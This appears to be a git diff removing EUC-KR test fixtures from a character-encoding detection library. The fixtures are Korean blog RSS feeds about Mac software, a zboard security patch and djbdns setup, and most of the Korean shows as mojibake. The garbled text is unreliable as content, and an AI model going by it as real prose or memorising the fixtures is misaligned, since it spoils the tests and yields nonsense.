    -.... ¾ֻ·ֱµו¸®±ג ¹־¸ֱַׂ ֱ₪µµ·־ °£´ַׁ ֱײ¼ׂ¶ר´ֿ´;;
    -
    -
    -
    -+ µ¡.
    -»ח½ַ ְּ »חְֶּ®´ֲ ְחֵ¶ְּ¹ֱּצ ֳ£ְ» ¶§ ֱס° ¾¹´ֿ´. °¡¼צְּ¸§+°מֱ¦¸ס ֱ₪µµ·־ ³ײ°ם µ¹¸®¸י ְחֵ¶ְּ¹ֱּצ°¡ ֱײ¸£¸₪ ¶ֱׂ. ^^ .... °ב±¹ ¾ְֶֶּ×ֱמ+¾ְֶֶּקµו ְּ¿כְ» ְ§ַׁ °ֻ»צ±ג·־ ¾²°ם ְײ´ֲ ¼ְְװ´ֿ´, ֱ¦ °ז¿ל´ֲ.. :)]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Wed, 28 Sep 2005 01:57:58 +0900 -
    - -½÷ֵ² (¶ַ) ¹²ו½ְ´ֿ´ -http://chisato.info/blog/index.php?pl=658 - -
    -
    -
    -
    -
    -»ח½ְַ÷, ְ¯ֱר ´װ²²¼­ [´«ְּ ¾ֱֶַ´]°ם ¸»¾¸ַֿ¼ֵ¼­.. ±׳·¯°ם÷¸´ֿ ´¸¥ ÷׀µי²²µµ ±׳·² ¼צ ְײְ»°ֵ¶ף´ֲ »‎°¢ְּ µי¾ת°ֵµח¿ה. ְ¥ֶהְֱּצ ±ְ°ֵ¸°ֱצ°¡ 6³ג ְװ´ֿ´¸¸, ±׳°£ ³ל»צ÷£ְּ½÷·־ ְְֿ» ¹תְ־°ַ µ µ־ ¹ר »׃. ³ל»צְ» ְ ¾²´ֲ °ְֽ÷ ¾מ·ֶ´ץ±÷¿ה. ^^:;
    -
    -
    -
    -ָ¯±÷ ´װְַ ½÷ֵ²ְ» ½ט½ְ´ֿ´. ±²ְוָק ¸ֱר ½÷ֵ²ְּ±÷¿ה, ְ¿כ½ֳִׁ÷¸´ֿ ´ץ´ץ¿ם.. ֱ¦°¡ »ח¿כֱַֿצ ¾°ם ְײ´ֲ(±׳¸®°ם ¾ױְ¸·־µµ »ח¿כַׂ °טָ¹ְּ ְַפ ¾ר´ֲ) ¹ז¸ם·ֿ°ת RSSֶהְֶּ ¸µֵ©¸¸ ¾ר¾½ְ´ֿ´. ±׳¸®°ם °³ְ־ְְ¸·־ ֱֱ¾ֱֶַֿצ ¾´ֲ ֶהְֱּצ÷ה ¸µֵ©µµ ¾ר¾±¸¿ה. ¹¹ ±׳ ֱ₪µµ »׃. ¿ר·¡°¡ ¸ֱר ½÷ֵ²ְ־ ´צ÷׀¿¡ ÷ם·־±׳°¡ ´ ÷׀ְ§±ג ְײ¾מ÷¸ְּ´ֲ ±÷¿ה.
    -
    -ֱ¶¸¸°£ ¹ט°זְּ¹ֱּצ³× ½½½½ ¹²ד÷¼±מ³×¿ה. .... ֱ¶¸¸°£ְּ·¡ ÷ֱ¾, ְּ·¯´°¡ ´¸¥ ½÷ֵ² °ם¸¦ ¶§±מֱצ ±׳³ֹ ¾²´ֲ °ֵ ¾ֶ´ׁ°¡ ½ְֽ÷ »‎°¢ְװ´ֿ´¸¶´ֲ(¿פְ½).]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Tue, 27 Sep 2005 22:36:50 +0900 -
    - -[±ֱצ] ¹ז¹‎ ְִָּ¿¡´ֲ [ַ״ֱ¦] ¹‎ְּ ³×¿ְ°װ ¸¶·ְֳּ´ -http://chisato.info/blog/index.php?pl=657 - -
    -±׳·¯³× °ב±¹ְ÷ °ב±¹ְ÷ ¶ױ¸®°װ µַ±ג ¸¶·ְֳּ´. ¼¼»ףְּ ´ ±׳·±°ֵ´.
    -
    -
    -
    -
    -
    -
    -ֳײ± ³׳ְּ¹צ ÷ם·־±׳¿¡¼­´ֲ ¼ׂ½÷÷¸±ג¸¦ ָ®½ַַֿ°װ ¸·¾ֶµ־´ֲ ¹÷°¡ְַ ֱ¶ִ¡°¡ °¡ַ״ֱר ¸נ¾חְ־µ¥.. ְּ·± ÷ם·־±׳´ֲ ¼ׂ½÷÷¸±ג·־ ַ״µµ ֵ« ֶהְֱּצ¸¸ ³×¿ֳ »׃ ¸ְ־ ֶהְֱּצְַ ¼ׂ½÷´ֲ ¾ָ ³×¿ְ°ם, ¿£°£ַֿ°װ ¸׃¸® ½ב¼­´ֲ ¼ׂ½÷ ִֶ³»±ג°¡ ¾מ·ֶ´. ¼ׂ½÷¸¦ ÷ֱ¾ µ¿¿µ»ף ֱײ¼ׂ¸¦ µ³¾ֵµ¥, ַֿ°ם ¸¶ְ½ µ¿µ¿ °ֵ¸®´ֲ »ח¶קµיְ» ְ§ַׁ ֱֶ !!
    -
    -.... ½ְַ÷ ³»°¡ ְ ¾²´ֲ ¹ז¹‎ְּ´.
    -
    -
    -
    -
    -
    -1. ¸ױְת ֳַ·¯±׳ְ־ ֶת´ץ¿¡ µי¾מ°¡¼­.. ¹ּµנ¾מֳַ·¹ְּ¾מ °·ֳ ֳַ·¯±׳ְ־ְ» »©³½´.
    -2. »חִֶ¸®¿¡¼­ ±׳ ֶהְֱּצ¸¦ ¿¬´.
    -3. .... µ¥½÷ֵ©ֵ¾ְ¸·־ ¸¶ְ½²¯ ´¿מ·־µו ַ״¹צ¸°´.
    -4. ¿רֱַֿצ ¾´ֲµ¥ ´¿מ·־µו µָ ³א¼®µי¸¸ ֱצ¿לְ.
    -
    -
    -
    -
    -¸ֶ OS X ¿¡¼­´ֲ °¡´ֹ.
    -¾ָ ¾´ֱצ ¿ְ·¡µַ¾מ¼­ ±ג¾ןְ÷ °¡¹°°ֵ¸®ֱצ¸¸, ְ©ֵ¸׃½ֵ¿¡¼­´ֲ [ְ¥¸¶]´ר°¡? ±׳°ֹ·־ °¡´ַֹ´ר ±ג¾ןְּ ³­´.
    -¿©ֶַֿ° ְּ°ְֽ¸·־ ¸נֳ³ְַ ֱײְ־ְוְּ ²ְ²ְ °¡·ֱ³ץ°ם ¼°³ץ°ם ÷¸µכ¾מ µ־´ֲ »±מְִּ¡ µ¿¿µ»ףְ» ְװ¼צ ֱ.. .... ¹ּ¾ַָ״¿ה~;; (< °³ְִַ [³×÷ׂ³×÷ׂ] ¹צֱ¯ְ¸·־ ְ׀¾מֱײ¼¼¿ה)
    -
    -
    -
    -
    -±ֱצַֿ¸י ´©±÷°¡°¡ ַ״ֱ¦ַׁ´. .... ְ½. ְּ°ַ ¸¸°םְַ ֱר¸®ְ־ °ֽµµ °°°ם.
    -
    -
    -
    -±׳³×ְת³× ֱרֲ¥ ¿ְ·¡°£¸¸ְַ ֶק½÷ְֳֶּ ¾¸ְֱּ³׳.
    -
    -ְּ·±ְת·± °ֽ ֱ״÷ס ְֱּ´ֿ±ס ±ג´·ֱֱײ¼¼¿ה. :)
    -(ְּ·¡³ץ°ם ¸מ ³גְּ °ֹ¸±ֱצµµ.. < ³ף´ד)]]>
    -±׳°ְֽ» ¾ֻ·ֱֱײ¸¶ ! -ַֿ³כ¾ֶ -Mon, 26 Sep 2005 16:19:15 +0900 -
    - -½÷ֵ² ¹²ו½ְ´ֿ´.. -http://chisato.info/blog/index.php?pl=655 - -
    -±׳·¯´÷¸´ֿ ¹÷°¡ ְּ»ףְּ ְײְ»ֱצµµ !!
    -ֱײָ²»צְּ ÷¸ְּ¸י ¾ָµַ´ֲ ½÷ֵ²ְװ´ֿ´. -₪µ- ֱײָ²»צְ÷ ¿¹ְ »צ±ע.
    -¾ֱֶק ±׳·± »צְּ ÷¸ְּ°ם ְײ´¸י ½ֵ°ם ÷־ֵ¹ַױ´ֿ´. :)
    -
    -
    -±׳¸®°ם ְַּֿµµ !
    -
    -¹ט°ז.. °ם¹־ַ½ְ´ֿ´¸¸, ְַּֿµµ·־ ³«ֲµַ¾ת¾מ¿ה.
    -
    -
    -
    -
    -
    -
    -¶ַ ַׁ ¹ר ¹÷¹ַױ´ֿ´¸¸, ְּ ½÷ֵ² ½ֳ¸®ֱמְַ ֳ¹¹רֲ°´ֲ ¼¼÷לְּ ¾ֶ´ֿ¾ת½ְ´ֿ´(´ָ£).
    -
    -+ µ¡.
    -±טµ¿¿ֿ ¶§³× ִ¡»חֵה ¶§¿ֽ ´¸®, ְּ¹ֱּצְַ ֶרְּ ֱ» ³׀¾מ¼­ 1024*768 ְְַַּֿ ָ¯°ז¿¡¼­´ֲ ¾ֶ¸¶µµ ְַּֿµµ ¾ף±¼ ְ§¿¡ ¸´÷°¡ ¿ֳ¶ף°¥ °ּ´ֿ´. -₪µ-;;
    -.... ¹¹, ¿הֱעְ÷ ÷¸ֵכ ֵ« ָ­¸יµי ¾²½ֱֳצ¸¸.. (¼ׂ½ֹ¼ׂ½ֹ)]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Sun, 18 Sep 2005 00:11:03 +0900 -
    - -¼¼¿שְַ ָו¸§ְּ¶ץ !! -http://chisato.info/blog/index.php?pl=654 - -
    -
    -
    -°£¸¸¿¡ ַֿµו¸¦ ֱ₪¸® ְֱװ´ֿ´.
    -
    -
    -¸ְֶ¸·־ ֳ³ְ½ ְֱּײְַ» ¶§°¡ ¶°¿ְ¸¨´ֿ´. .... ±׳¶§ְַ ¸ְ־ְ÷ OS 9 ְּ¾ת°ם.. ¾מ¼­ »¡¸® X ְ¸·־ ְֱּײַֿ°ם ½ֽ¾מ¼­ ¾ָ´ְּ ³µְ» ¶§¿´ֱׂ.
    -ֱצ±ְ÷ iLife¶ף°ם ַ״¼­.. ֶ׀ֵ°ֱצ·־ ¸µו·¯ֱר ְ§¿כְ» »ֻ³»°ם ְײֱצ¸¸, ¾מֲ·°ֵ³× iTunes ´ֲ ֳ³ְ½¿¡ ְַפ »ח¿כֱַֿצ ¾¾ׂ½ְ´ֿ´. .... ְֿ´ ¾מ¶»°װ ¾²¶ף´ֲ °ֱַצ¸¦ ¾ֻ ¼צ°¡ ¾ר¾ת¾מ¿ה;;
    -±׳·¯³× ¾ף¸¶ ִָ ֵ¬¸° ְ־½÷ֵחַֿ¸י¼­ DB ֱ₪¸®¸¦ ´½ֳַֿ°װ µַ¾ת°ם, ±׳·¯´ֲ ¹¿¡´ֲ ½ב÷¸ְ ½ֽ¾מ¼­ iTunes ¿¡ µµְַֿ°װ µַ¾ת½ְ´ֿ´.
    -
    -
    -
    -.... ¼ײֱקָק, iPod¿¡¼­ °¡ְו ¸ֵ·ְְֲ־ ÷־÷׀ְ÷ ¹·־ [µי°ם´´ֿ´ֲ iTunes]¶ף´ֲ ֱ¡ְּ¾ת½ְ´ֿ´. ±׳·² ֱ₪µµ·־ iTunes ¿¡ ַ׿ם ÷ֱ®¹צ¸° °ֱֵׂ~ (ַלַע)
    -
    -
    -
    -
    -±׳¸®°ם ¾ף¸¶ ְ ±מֱצµµ ±׳³ֹ [ִ«¸¶ף ¹י¾ק]¿¡¸¸ »ח¿כַֿ´ר iPhoto ¸¦ ְֱּ¦ ֱ» ָ°¿כַ״÷¼±מ ַױ´ֿ´. ֱצ±ְ÷ ±׳·± ְְֿ» ַֿ°ם ְײ¾מ¿ה. ֶש»חֱר ¹י¾קַ״µ־¾ת´ר °ֽµµ ֱ₪¸®ַֿ°ם..
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -.... ¹¹, »ח½ַ ¸ְ־ְַ ֱײֱ¦´ֲ ְּ°ְּֽ ¾ֶ´ֿ±¸¿ה.. -₪µ-;;
    -
    -
    -
    -
    ¼¼¿שְ÷ ¹«»ףַֿ´ץְּ´(ֵכ°מ).

    -
    -
    -
    -
    -
    -
    -
    -2003 ³גְַ ֱ¦ ¸נ½ְְ÷ ¾מֲ·°ֵ³×, ֱצ± ÷¸´´ֲ ֱ״¼צַױ´ֿ´. ְ‏ְ½ְּ¶ץ ְּ·± °ֹ±מ !?, ַֿ°ם ֱרֱצַֿ°װ °ם¹־ַֿ°װ µַ¾ת½ְ´ֿ´.
    -
    -¾ָ ±׳·¡µµ ¾ף¸¶ ְ ¸׃¸®¸¦ ַֿ·¯ °¡¼­ ¾מ¸׃´ֿ²², [¿©ַא»חֱר ֱ₪¸®ַֿ·ֱ°ם ְּ°ְֽת°ֽ µֱצ´÷¸´ֿ±ס ֱצ³­ ¹ר ¸׃¸®°¡ ´ץ ³×ְ÷ °ֽ °°¾ֶ. ³× ±׳³ֹ ֱצ³­ ¹ר ½÷ֵ¸ְֿ·־ ַׂ·¡] ַ´ץ´ֿ ¾מ¸׃´װ ¸»¾¸, [.... ±׳¶§´ֲ ´ח½ְֵּ ¸מ»לְּ¼ּ´ֲµ¥¿ה(¿פְ½)] .... ֱ₪³ח ±׳·± °ּ´ֿ±מ !!?? .... ¾מ·ֱ¼­ ְּ» °ֵ¿¹¿ה?! ±׳ ¸׃¸®°¡ ¾מ¿ן¸®´ֲ °װ ¾ֶ´ֿ°ם?!!!!?? (ְ‎±װ)
    -
    -
    -
    -¹¹, ±׳·± °ּ´ֿ´.
    -
    -ֱצ±ְַ ַֿ·חַֿ·ח¸¦ ¼ֱָׂק ¿©±י½ֳ´, ¿©·¯÷׀. < ֱרֱצַװ.]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Sat, 17 Sep 2005 06:04:57 +0900 -
    - -»ח½ְַ÷ 0.96 ְװ´ֿ´ -http://chisato.info/blog/index.php?pl=653 - -½÷ֵ² ¸¸µי±ג°¡ ±ֲֽת¾ֶ¼­ ´רֱ®µ־°ם ְײֱצ¸¸, »ח½ְַ÷ 0.96 ְװ´ֿ´. ¾ֶ¹«·¡µµ ¿©ַא±ג °°ְ÷ °ֹ ¾²·ֱ¸י ְ§ִ¡·־±׳¶ף°ֵ³×, ֵ°·־±׳¶ף°ֵ³×. ְְ. ַ¿הַֿ´°ם »‎°¢ַ¾מ¿ה.
    -±׳·¡¼­ ַצְח´ֲ 0.96 ְװ´ֿ´. »ח½ַ ְּ°ַ ÷°·־ ³מ¶ף¿ן ְְֿ÷ ¾ֶ´ֱֿצ¸¸-, ¾מֲ·°ֵ³× ½÷ֵ² ¶§¹®¿¡ ¸׃¸®¸¦ ½גְּ°ם ְײ´ה´ֿ´. ÷°°ַ ¾ֶ´ֿ°ם, ¹ט°זְּ¹ֱּצ¸¦ °»½ֵַ״÷¸°ם ½ֽ¾תֱצ¸¸ ¸¶¶¥ַׁ ִָ÷¸°¡ ¾ר½ְ´ֿ´. .... ±׳·¸´°ם ³»°¡ ±׳¸± ¼צµµ ¾ר´ֲ ³כ¸©ְְּ¾ֶ ! < °װְ¸¸£´.
    -
    -±׳·± ¿¬ְ¯·־ ִָ÷¸¸¦ ֳֳµַ״ֱײ½ֳ±ג ¹¶ר´ֿ´. ֳײ±¿¡´ֲ ¾מֲ¾ֱצ ָק°¡½ֳ¾¸¶(¼ׂ³ג´כְַ) ¶ף°ֵ³×¿¡ ÷ֱ®ְײ½ְ´ֿ´¸¸, ±׳·¸´°ם ¹ֱֵ¿¡ ±ע¾ֶµ־±ג¿¡´ֲ ¾ֱֶק ¾ֶ´ֲ °װ ÷°·־ ¾ר¾מ¼­ ¹־¸ֱ¹־¸ֱ. ֳײ¼ַׁׂ ´©°¡ [ְּ »ח¶ק ´©±¸¼ְ]ַֿ°ם ¹°¾מ¿ֳ ¶§ ´ה÷¯ַׂ ֱצ½ְִ÷ ½׳¾ֶµ־°ם ±׳·± ֱ‏ְ» ¹ת¿©¾ ֱַֿצ ¾°½ְ´ֿ±מ.
    -
    -
    -
    -±׳·¯°ם÷¸´ֿ ¾מֱ¦´ֲ ¿ְֵ°¼¾¼¼ְַ ¿ְַַ¼ָ¿¡ ±מ¸¶µז ¸נְ¶ף´ֲ ְֿ÷»¾מ·־ ¹־ֶף¸¦. .... ¹־¸ֱַׁ ְֿ¸¸ ¹תְּ°ם ´´ֿ´ֲ ְֱּ±÷¿ה(¶½).
    -
    -
    -
    -2.
    -¾ְֶֶּ×ֱמ ¾קַ½ְ´ֿ´(ver. 5). µ¢´¾ֶ »חִֶ¸®µµ.. »ח½ַ »חִֶ¸®´ֲ ²ֿ ¿¹ְ¿¡ ַ¾מ¾ ֱַצ¸¸ ֱ₪ֳ¼÷ׂ¸םְַ ֵ©¶ש½´°¡ °ט¼׃µַ¾מ¼­, ְַפ ¾קְ» ¸רַֿ°ם ְײ¾ת´ה´ֿ´. ְּ¹ר¿¡´ֲ ¸¾ ְג°ם ֳַ·¯±׳ְ־µיְ» ¸נµ־ ֱ¶»חַ״¼­, ֵ©¶ש½´ְַ ¿רְ־ְ» ְג¾ׂ½ְ´ֿ´. ±׳ֲµµ ¹צֱ¯ְּ ¿ֳ¶ף°¡ ְײ´ץ±÷¿ה. .... ֶםַֿ°װ ¾²°ם ְײ´ֲ °ֵ¶ף¼­ ´ַאֳµ¸¸. ¹צֱ¯¾קְּ ¾ָµַ°ם ְײ¾ת´ץ¶ף¸י »חִֶ¸®´ֲ ¶ַ ¿¹ְ °ְֽ» ½ב¾ ְַ» °ֵ¿¹¿ה.
    -±׳³×ְת³× ¾מֱ¦ ִִַ»ֵֽ¸¦ °£¸¸ ¾קµ¥ְֶּ® ַׁ µ¥¿¡´ֲ »חִֶ¸®°¡ ¹ֳִּ¹צ¸° ֵ¿ְּ ֵ®´ֿ´. ֳ³ְ½¿¡´ֲ ³׳ֶ®¿צֵ© ¹®ֱ¦ְ־ ֱ·־ ¾ֻ¾ְׂ¸³×-, ְִֶּ¾מֶר½÷ ¸ײֲִ. .... ¾ֱֶקµµ »חִֶ¸®°¡ ¿ײ ±׳·¸°װ µַ¾ת´ֱֲצ´ֲ ְ ¸נ¸£°³׳¿ה. ¹«ַׁ µפ·¹ְּ °ֹ¸®´ץ¸¸.
    -
    -
    -
    -3.
    -±׳·±µ¥ ֲֵֵֽ ֶַ¿ֳ¸®°ם¼­ ֵ°·־±׳ ½ֵּ©ַֿ·¯ ְּ°ְֽת°ֽ µׁ·¯÷¸´÷¸´ֿ±מ.. ֳ³ְ½ ½ְֳַׂ ¶§ְַ ְּ ÷ם·־±׳´ֲ ²ֿ ¾ֳֻ¡¾ת´´ֲ(ֱ₪¸»?) °ְֽ» ±ת´°װ µַ¾ת½ְ´ֿ´. .... ¾מֲ¾ֱצ ½ֵ÷¯ְג±ג·־ ³×°¡°ם ְײ°ם.. .... ֶק½÷ֶ®¿¡ ¾µ ½ֳ°£ְּ ¾ר´ֲ °ְּֽ¶ף¸י ְַּ״¸¦ ±¸ַׂ ¼צ ְײְ»±מ³×¿ה;;
    -¿©ַא±ג¶ףµµ ¿ֳ¸®±ג ½ְֳַֿ¸י ֱ» ³´ֱצ ¾°¾מ?, ַֿ°ם ½÷½÷·־ ְ§·־ַ״÷¾´ֿ´. .... ³×» ³א¼® °°ְ¸´ֿ¶ף±¸(¿פְ½).
    -
    -
    -
    -
    -
    -¹¹, »ח½ַ ְּ¹ּ 0.96 ְּ±גµµ ַֿ°ם, ֱ¶¸¸°£ ¿©ַא±ג·־ ÷ֻ°װ µַ±ג¸¦ °£ְ‎ָק ±ג¿רַ״÷¾´ֿ´(¾ֶ¸א). < ±׳°ַ ְֲּ¿¡¼­ ±ג¿רַׂ ¹®ֱ¦´ֲ ¾ֶ´ֱׂצµµ;;]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Fri, 9 Sep 2005 09:45:48 +0900 -
    - -Come Back Home -http://chisato.info/blog/index.php?pl=652 - -
    -
    -
    -
    -ֱס°ֵ¿מ ¿©ַאְּ¾ת½ְ´ֿ´. ַֿ°ם ½ְֽ÷ ¾ך±גµµ ³¹« ¸¹°ם, »חֱרµµ ¸מ¸מ ֲן¾ת½ְ´ֿ´(¾ֶ´ֲ »ח¶קµיְ÷ ְ ¾ֱֻצ¸¸, »חֱרְ» ֲן´ֲ ֶםְּ ¸ר µַ±ג ¶§¹®¿¡ ְת·־¼­´ֲ ֶ¯ְַּׁ ÷¸°ם»חַ׳ְּ ¸ֲ¾ֶ¿ה -¿פְ½).
    -
    -µ¹¾ֶ¿ֽ¼­ ְּ°ְֽת°ֽ ֱ₪¸®ַֿ°ם, ½¬´°¡ °¡ֱ·°ת ַװ²² ְת³ב¸װְ¸·¯ ³×°¬´°¡ µי¾מ¿װ½ְ´ֿ´. ¿ְ´ְֳ÷ ְּ¸¸ ְבµי±מ ַֿ´°¡ ÷ם·־±׳ »‎°¢ְּ ³×¼­ µי·¯÷¸·¯ ¿װ´ה´ֿ´. ^^
    -
    -
    -
    -
    -ְ¼¼ַׁ ¾ך±ג´ֲ ֳµֳµָק ַֿµµ·ֿ ַׂ°װ¿ה. ¾מֲ·°ֵ³× ¸נµ־ ְ ֱצ³»°ם °ט¼ּ½ְ´ֿ±מ? ¾ֶ÷סµµ ְ ֱצ³ֲ½ְ´ֿ´. :)
    -
    -(¾ױְ¸·־ְַ) ÷¸°ם»חַ׳ְ» °£´ָק ÷ך¸®ַ־(?) ְַֿ¸י,
    -
    -
    -** mp3p °³÷סַ½ְ´ֿ´.
    -** ¸¸ָ­ֳ¥ ¸מ ±ַ »ח¼­ µי¾מ¿װ½ְ´ֿ´.
    -
    -
    -¿©±ג¿¡ ´כַׁ »חַ׳ְּ ¿©ַא±ג·־ ¿ֳ¶ף°¥ ¿¹ֱ₪ְװ´ֿ´. .... ¾מµנ±מֱצ³× '¿¹ֱ₪'ְּ¹ַ·־, ¾ָ ¾µֱצµµ. -₪µ-;;
    -
    -
    -
    -±׳·³ ְֱֱ÷ ¹ד µַ½½ֳ¿ְ. ְֱֱ÷ ²µµ ²½ֳ±¸¿ה. 9¿שְװ´ֿ´. 9¿שµµ ַא÷¹ַֿ°װ.]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Thu, 1 Sep 2005 22:35:29 +0900 -
    -
    -
    \ No newline at end of file diff --git a/chardet/tests/EUC-KR/console.linuxstudy.pe.kr.xml b/chardet/tests/EUC-KR/console.linuxstudy.pe.kr.xml deleted file mode 100644 index 5bb086a..0000000 --- a/chardet/tests/EUC-KR/console.linuxstudy.pe.kr.xml +++ /dev/null @@ -1,196 +0,0 @@ - - - - - -₪· ₪¿ ₪± ₪¿ µµ ±׳ °ַ ₪₪ ₪ֳ ¿´ ְ» °ֹ -http://console.linuxstudy.pe.kr/blog/weblog.php - -euc-kr - -₪· ₪¿ ₪± ₪¿ µµ ±׳ °ַ ₪₪ ₪ֳ ¿´ ְ» °ֹ - -http://console.linuxstudy.pe.kr/blog/weblog.php - - - -ְּ»חַ½ְ´ֿ´. -http://console.linuxstudy.pe.kr/blog/weblog.php?id=P251 -<br /> -<a href="http://console.linuxstudy.pe.kr/wordpress/" >http://console.linuxstudy.pe.kr/wordpress/</a><br /> -<br /> -ְּ ÷ם·־±׳·־ְַ ¸µֵ©´ֲ ֱ¶¸¸°£ »ח¶ףֱת ¿¹ֱ₪ְװ´ֿ´. - - -ְְּ־? ְְּ־? ְְּ־? -http://console.linuxstudy.pe.kr/blog/weblog.php?id=P250 -µµְ 1000°מְּ¶ף´ֲ »‎¼ַׁׂ ֱַ·־±׳·¥¿¡ ¿ל¿¬ָק ´«ְּ ¸׃¹°·¶´.<br /> -<br /> -ְְּ־?<br /> -<br /> -¾מ¶² »ח¶קְ־ֱצ ¸פ¶ףµµ ֱ₪¸» ¸ֵ·ְְֲ־ ¸ס¼ׂ¸®ְּ´. °ֻ»צ¿£ֱר¿¡´ֲ µמ·ֿµַ¾מ ְײֱצ ¾ְ½....<br /> -<br /> -³×ְּ ¸¹ְ÷ µםַׁ ¾ֱֶ¸¶? ¾ֶ°¡¾¾? <br /> -<br /> -ֱ¿הַׁ°ַ ֱ₪¸» ¸ֵ·ְְֲ־ ¸ס¼ׂ¸®... - - -zboard patch!!! -http://console.linuxstudy.pe.kr/blog/weblog.php?id=P249 -KLDP¿¡¼­ ¸חִ¥ ְ¿¡ ÷¸±ה ַ´ֲµ¥ xpdf ¿¡¼­ ַׁ± ָ­ְְּֿ ¿­¸®ֱצ ¾´ֲ´´ֲ ְְּ¯·־ ¹זִ¡µַ´°¡, ¿ְ´ֳ¿¡¾ ֱ» ²פְ°ֵ¸± ¸¶ְ½ְּ »‎° ֶ׀ִ¡ַ´. ±׳·¯°ם ÷¸´ֿ ֶ׀ִ¡ַ״¾ ַׂ °קְּ ַׁ µ־°קְּ ¾ֶ´ֿ±÷... ;;;<br /> -<br /> -<br /> -Vulnerability 1: As of zboard 4.1pl4<br /> -- - ----------------------------<br /> -Insert the following code at 59th line of outlogin.php,<br /> -<br /> -if(eregi(":\/\/",$_zb_path)) $_zb_path="";<br /> -<br /> -<br /> -Vulnerability 2: As of zboard 4.1pl4<br /> -- - ----------------------------<br /> -Insert the following code at 15th line of include/write.php,<br /> -<br /> -if(eregi(":\/\/",$dir)) $dir="";<br /> -<br /> -<br /> -Vulnerability 3: As of zboard 4.1pl4<br /> -- - ----------------------------<br /> -Insert the following code at 3rd line of check_user_id.php,<br /> -<br /> -$user_id = htmlspecialchars(trim($user_id));<br /> -<br /> -<br /> -°·ֳ URL :<br /> -<br /> -<a href="http://lists.netsys.com/pipermail/full-disclosure/2004-December/030224.html" >http://lists.netsys.com/pipermail/full-disclosure/2004-December/030224.html</a><br /> - - - -»נֱתְַ ±ג·ֿ -http://console.linuxstudy.pe.kr/blog/weblog.php?id=P248 -make world ִָ¿¡´ֲ ²ְ ַׁµ־°¡ֱצ ¹®ֱ¦ֱ¡ְּ ¹»‎ַֿ´ֲµ¥ ְּ¹ר¿£ named ¿´´. ¾ָ±׳·¡µµ sendmail+bind ¿¡¼­ qmail+djbdns·־ ְָ¯ַֿ·ֱ´ֲ °טָ¹ְ» °¡ֱצ°ם ְײ¾ת±ג¿¡ ְּ¹ר ±גָ¸¿¡ djbdns¸¦ ¼³ִ¡ַֿ±ג·־ ְֱ₪, ֲ×°װ³×¸¶ »נֱתְַ ָחְְ» ³²°µ׀´.<br /> -<br /> -# cd /usr/ports/dns/djbdns && make install clean<br /> -<br /> -ְֱַ¸¼÷¶§¹®¿¡ daemontools, ucspi-tcp ְּ °°ְּ ¼³ִ¡µָ´.<br /> -<br /> -# pw groupadd -n djbdns<br /> -# pw useradd -n dnslog -g djbdns -d /noexistent -s /sbin/nologin -c "dnslog" -w random<br /> -# pw useradd -n dns -g djbdns -d /noexistent -s /sbin/nologin -c "dns" -w random<br /> -# mkdir /var/service<br /> -# tinydns-conf dns dnslog /var/service/dns 0.0.0.0<br /> -# cd /var/service/dns/root<br /> -# ./add-ns aaa.com 0.0.0.0<br /> -# ./add-ns 0.0.0.in-addr.arpa 0.0.0.0<br /> -# ./add-host <a href="http://www.aaa.com" >www.aaa.com</a> 0.0.0.0<br /> -# ./add-alias ftp.aaa.com 0.0.0.0<br /> -# ./add-mx aaa.com 0.0.0.0<br /> -# make<br /> -# sync <br /> -# sync<br /> -# sync<br /> -# reboot<br /> -<br /> -/etc/rc.conf ¿¡¼­ named_enable="NO" <br /> -<br /> -»נֱתְַ ½ְְֳ÷ /usr/local/etc/rc.d ¿¡ svcscan.sh °¡ ְײְ½¿¡µµ ֱַ·־¼¼½÷°¡ ¿ֳ¶ף¿ְֱצ ¾´ֲ´´ֲ »ח½ַ¿¡¼­÷־ֵֽ¿´´... OTL <br /> -ְּ¸®ְת¸® ¸׃¸® ±¼¸®¸ח svscan.sh start ַ״ֱאµµ ¹ְְְּ ¾ר±ז·¡...<br /> -<br /> -# supervise /var/service/dns/<br /> -<br /> -¼צµ¿ְ¸·־ ½ַַא½ֱֳִׁײ°ם ֱ¾·ב.. -₪µ-;; daemontools ¿¡ ´כַׁ ¾א°£ְַ ֱ¶»ח°¡ ´ץ ַ¿הַׂ µם. ְּ »ףֲֵ·־ qmail±מֱצ °ַµי±ג¿¡´ֲ ¹«¸®°¡ ְײ´. <br /> -ַצְח·־¼­´ֲ ÷¸¥ ¹ְְ¿¡ ¸¸ֱ·ַֿ°ם ְײ´ֲ ְֱּ´. - - -uptime -http://console.linuxstudy.pe.kr/blog/weblog.php?id=P247 -bsd# uptime <br /> - 4:32PM up 71 days, 13:31, 1 user, load averages: 0.00, 0.00, 0.00<br /> -bsd# uname -a<br /> -FreeBSD bsd 6.0-CURRENT FreeBSD 6.0-CURRENT #12: Mon Aug 23 04:26:35 KST 2004 pravda@bsd:/usr/obj/usr/src/sys/ORACLE i386<br /> -<br /> -½ֹ½ַֹֿ¸י ¼ׂ½÷ ¹°ם buildworld¸¸ ַֿ´°¡ ¿ְ´ֳ ֵ« ¸¾ ¸װ°ם installworld ַֿ·ֱ°ם ַֿ´ֲµ¥...<br /> -<br /> -¿ײ ְ² uptime¿¡ ´«ְּ °¡´ֲ°ֱַצ...<br /> -<br /> -¾ֶ¹«·± ְַ¹ּ¾ר´ֲ ¼‎ְ¿¡ ÷ׂ°תַֿ´´ֲ »ח½ַ. ¸׃¸®·־´ֲ ¼צ±אְּ °¡´ֲµ¥, ¸¶ְ½ְ÷ ¾ֶ´ׁ°¡÷¸´.<br /> -<br /> -Solaris ¸׃½ֵ ÷¸µו ¸ֱ°¡ֱצ±ג ְ ±ג·ַֿ´ר 260¿©ְְַֿ uptime ְּ ְ²¸¸ ¶°¿ְ¸¥´.<br /> -<br /> -¾ֶ¹«·± µµ¿עµµ µֱַצ ¾´ֲ ְּ³נְַ ¸ֱ»ף.<br /> -<br /> -¿ײ, µµ´כֳ¼ ¿ײ uptime µְ§¿¡ ֱ‎ֲרַֿ´ֲ °ְֽ־°¡? - - -ַֿ¿ןְַ ¿עֱקְּ´ֲ ¼÷ -http://console.linuxstudy.pe.kr/blog/weblog.php?id=P246 -<img src="http://console.linuxstudy.pe.kr/blog/images/uploads/howl.jpg" border="0" alt="ַֿ¿ן ֶק½÷ֵֽ" name="image" width="400" 